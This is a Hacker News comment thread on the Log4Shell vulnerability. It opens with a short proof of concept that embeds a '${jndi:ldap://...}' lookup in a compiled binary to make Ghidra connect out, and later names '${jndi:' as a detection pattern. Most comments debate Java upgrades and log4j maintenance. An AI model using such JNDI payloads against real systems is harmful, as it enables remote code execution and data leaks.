    __attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}")))
    int a = 1;
    int main(){}
compile this with gcc, listen on port 1234 in netcat # gcc main.c -o main # nc -lp 1234

Launch Ghidra, confirm that it is using OpenJDK 11.0.11, and then open the built binary. It absolutely connects to localhost port 1234 and spits out some garbage there. Perhaps it does not have RCE impacts but it does cause the system to do something unintended and could expose IP addresses or other aspects of the running environment.


It does have the RCE impact. You can still use gadget chains.


Good to know. My point was mostly that it still seems to happen on "new" JVMs and I'm not sure if I'm doing something wrong or if openjdk is different than Oracle JDK.


Although the Java ecosystem generally moves glacially slow, Java 11 is still supported an has LTS status. Unless you're willing to risk your livelihood on briefly-supported versions, you'll probably want to stick to an LTS release.

Java received a new LTS release this year. In the three years between Java 11 and the latest LTS there were six new releases. That's a lot of releases, and you can easily end up with a dependency that doesn't work with a new version of Java yet before the working version goes out of support.

Also, the update advice only works for the very specific demo exploit. Other exploits still work, so you'll need to update the library itself.


I wouldn't agree that these are "pretty old." Maybe in frontend terms of software, but not backend.


2-3 years is pretty old.

Java backward compatibility is really good, even better when it's on the same major I don't see why you shouldn't update. You have a docker image with java, just pull the base image before you build, you run it bare you/need to update the server packages periodically, better if you have unattended update setup (default in recent ubuntu versions tho might need a server restart for some to apply) It's not like between java updates there aren't any security fixes, there are so you should update.

Nevertheless other mitigations like not exposing internal services to the internet would have blocked these attempts.


> 2-3 years is pretty old.

In the JS or NodeJS world, sure. For pretty much everyone else, not so much.


I wasn't talkin about a 3rd party library, Java is your runtime platform it has security fixes roll out.

If you are an enterprise company that runs 3 year old java version then

1) Your CSO and CIO should all be fired

2) Your security team should be replaced

3) Your ISO 27001 and SOC2 certification among others should be revoked


Until two months ago the LTS release of Java - Java 11 - was 2 years old.


Not sure what you are talking about.

Java 11 was released on 2018-09-25

Java 11.0.2 that contained the "fix" was released on 2019-01-15

Java 11.0.13 (latest) was released on 2021-10-19

Also Java 8u192 was released on 2018-10-16


I think you and parent(s) kept exchanging messages which conflated major and minor Java versions.

Java 11 as a major is not old, it’s probably the best GA version right now, 17 is at a very early adoption stage.

Openjdk 11.0.0 would be too old, though.



If it's an enterprise running a 3y old JVM, what makes you think they have a CSO, CIO, or security team?


For internet connected software, it's pretty old. If you don't update for 3 years and expect to still be secure, you are in for a shock.


Obviously you shouldn't go three years without security patches. But it's perfectly reasonable to not update to a new major version for three years.


Not keeping up with patch versions of your runtime.

As other comments mentioned even with a patched JDK you are still vulnerable in other ways, but the specific method this whole thread is about seems to have patches in Java 8 and 11 releases.

I understand that lagging new major releases by years and be prudent for different apps, but there is no excuse not to be updating your patch versions.


Something that's 2-3 years old maybe has enough bugs worn off it by the early adopters that enterprise users might start thinking about maybe using it in Q4 of next year. After a massive pilot program to do a test rollout and lab deployment.


They are. You should have an up-to-date runtime to prevent vulnerabilities or just to have more-or-less accurate TZ databases if anything else.

It can be Java 8, but please use one with actively developed security patches.


If you had the extended support contract, you could get that version of Java 6. I could have sworn 6u212 was the last release before it hit OEL. (been a while) Java 7u321, 8u311, and 11.0.13 are current. 7, 8, 11, and 17 are all LTS releases that get quarterly patches - so the minor upgrades are pretty painless if you happen to be stuck with something older.


I have tons of stuff running on Java 8. It's LTS version and no reason to change working builds, adding more unknowns into the system.


The log4j patch to fix this vuln is available since March 2021. 9 months later... time to panic.


Java 11 is not deprecated. It is fairly absurd to frame it as old.


Can't edit this, but apparently there are multiple attack vectors and only a few are mitigated by a recent version of java. More here from brabel: https://news.ycombinator.com/item?id=29524578

tl;dr: upgrade your version of log4j.


My team still uses .Net Framework 4.6. That's from like 2015. While not "ancient," it's still pretty old. But for instance, when the SolarWinds hack ocurred, we actually lucked out cause we were using a version of it before the intrusion.


My org at AWS just upgraded from Java 8 to Java 11 last year. I doubt anyone is on 17.


The thing is it’s not about Java 11, 14, or 17. If you must be on 8 at least use the latest patch versions.


Oh I didn't realize that.

That makes patching the issue pretty trivial then, right? Anyone deploying production software should be updating their minor versions anyway.


The latest LTS version of OpenJDK is 11 (https://adoptopenjdk.net). I certainly don't touch the Oracle version with a barge pole and I assume that a large proportion of the industry also avoid it.


FYI: AdoptOpenJDK is now https://adoptium.net/ and the latest LTS version is 17.


There's something funny about an OpenJDK release being hosted on a .net domain. dotnet really is a terrible name for a programming language and framework.


.net domain is for network operators and that sort of thing. Precedes and nothing to do with Microsoft dot net.


Of course, that's where Microsoft's dumb name probably came from. They already had COM, needed a new name (COM+ sucked) so they went NET.


They went with .NET because it was supposed to bring DCOM into the Cloud via SOAP.

Except Cloud still wasn't a thing back then, and we had to go through the whole SOAP, XML-RPC, REST but not really, GraphQL, gRPC fashion cycle to come back to Microsoft's vision of Web APIs.


Ugh. That seems like a really, really silly name change.

Going from something obvious, to something that has no immediate relationship to java, jdk, or anything related. :/

I guess people will have to learn to remember it over time.


Some time ago I read a pertinent comment from someone working on JDK here on HN. Unfortunately I can't find it, so I'll have to paraphrase:

Even though Adoptium has some big names backing it, they aren't big contributors to Java. This is relevant because it implies they get access to not-yet-publicly-diclosed vulnerabilities and the corresponding patches later than other projects. Rather, one should try to use a distribution by one of the major contributors, for example Red Hat or SAP.

Since I cannot currently provide the source and I cannot personally verify this either, take this with a grain of salt.


You are undoubtedly referring to pron's comment here:

https://news.ycombinator.com/item?id=28821316


The folks who work at Adoptium contain many OpenJDK committers (especially from Red Hat and Microsoft) so it does contribute back (but you’ll see folks using their company addresses). I agree that can confuse folks


> Ugh. That seems like a really, really silly name change.

When they became an Eclipse project, the Eclipse Foundation was concerned that "AdoptOpenJDK" might lead to trademark problems with Oracle, given that "OpenJDK" is an Oracle trademark. Absent explicit permission from Oracle to use a name incorporating "OpenJDK" (which has not been received), Eclipse said the name had to change.


Actually, the full name is Eclipse Adoptium Temurin now. O_o


Same with Azul zulu. 17 is lts.


Maybe this will hasten the demise of Java


Why does Java the language have to be a target of demise because of an exploit in a library written in it? This kind of exploit would be possible in other languages.


Java has remote code execution as a feature built in, which is possible in other languages but not widely used.


Now i could consider Java as Flash in server and it'll eventually be killed by Javascript ?


Backwards compatibility over quality is possibly the dumbest fucking idea our field has punished itself with. When we fail to combat it, we deserve the pain we get.

That said, unpaid developers deserve shit just as much as they are receiving compensation. Although fame can be some sort of compensation, you shouldn't lose more of it than you've gained by doing the project.


For exposure


It'd be interesting to see a library versioning model where every release is a breaking release, where we accept that Hyrum's law is a fact of reality (like Nix I guess?).

Then, the release process of a new version is additionally required to provide some migration path from previous releases. For example, if the language-level API is the same, but the behavior is slightly different, provide a diagnostic message that shows up in the editor when the library's updated.

On the other hand, if the language-level API has changed, additionally provide a "go fix"-like program that can migrate the user's code to use the updated library. As long as a migration path is provided/automated, updating libraries would be as easy updating to use an API-compatible release.


Much like the truism I heard over the last week “friends don’t let friends use us-east-1”, this is one I heard a few years ago “Everything under the Apache umbrella is shit or will turn to shit.”


> Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc.

They've been doing a poor job of communicating. Considering the attention this issue is getting, they should have a prominent notice on their project page[0] about it like the one Logback[1] has telling people that they are not affected.

Furthermore, even their post about the issue[2] still fails to clarify many details like

* are people using newer JDK versions safe, like one commenter in this very thread assumed[3] ?

* does it only affect the format string and not parameters as many [falsely] claimed when the news started making the rounds ?

* what should people trying to block exploitation on a firewall level look for ?

> for a feature we all dislike yet needed to keep due to backward compatibility concerns.

They have not recognized the security risk posed by what is effectively an expression language interacting with user-submitted data. Java projects used in server-side templating like OGNL, JSP and JSF implementations, Spring keep having security vulnerabilities with this even after 20+ years. It is an effectively impossible task to get this 100% secure.

The ridicule Log4j is getting serves a purpose beyond fun: it lets people know that the project's maintainers are not up to the task and another logging library should be used instead, as there might be more issue still undiscovered or added in the future.

[0] https://archive.ph/ZhjWO

[1] https://archive.fo/QkzIy

[2] https://archive.fo/NvjKP

[3] https://archive.fo/5cNtw


- Newer version of JDK kind of mitigate the issue by disallowing by default the vector used to get the untrusted code. - Parameters are affected as well as it seems that there is some form of recursive string interpolation going on. - Packet inspection would lookup for the string interpolation for jndi lookup in the client message "${jndi:" which in most case should have no reason in being in client trafic (if not compressed).

Again the risk is real when the server use un-sanitized client data.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: